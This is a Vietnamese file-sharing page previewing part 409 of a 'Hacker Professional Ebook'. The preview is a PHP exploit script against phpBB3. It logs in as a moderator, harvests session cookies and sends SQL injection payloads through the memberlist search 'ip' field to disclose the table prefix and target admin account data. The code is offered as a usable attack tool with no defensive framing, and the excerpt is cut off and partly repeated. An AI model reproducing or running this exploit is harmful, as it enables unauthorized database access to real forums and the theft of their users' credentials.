1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 409 pdf

12 43 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 12
Dung lượng 20,02 KB

Nội dung

you need a global moderator account with "simple moderator" role */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phpbb3\n"; echo "user/pass: u need a valid user account with global moderator rights\n"; echo "Options:\n"; echo " -T[prefix] specify a table prefix different from default (phpbb_)\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo " -u[number]: specify a user id other than 2 (admin)\n"; echo " -x: disclose table prefix through error messages\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy ';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $port=80; $prefix="PHPBB_"; $user_id="2";//admin $discl=0; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); } if ($temp=="-x") { $discl=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="username=".urlencode($user); $data.="&password=".urlencode($pass); $data.="&redirect=index.php"; $data.="&login=Login"; $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if (eregi("_u=1;",$cookie)) { //echo $html."\n";//debug //die("Unable to login "); } echo "cookie -> ".$cookie."\r\n"; if ($discl) { $sql="'suntzuuuuu"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&s k=c&sd=a&ip=%5C%27&form=post&field=username_list&m ode=searchuser&form=po st HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"You have an error in your SQL syntax")) { $temp=explode("posts",$html); $temp2=explode(" ",$temp[0]); . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN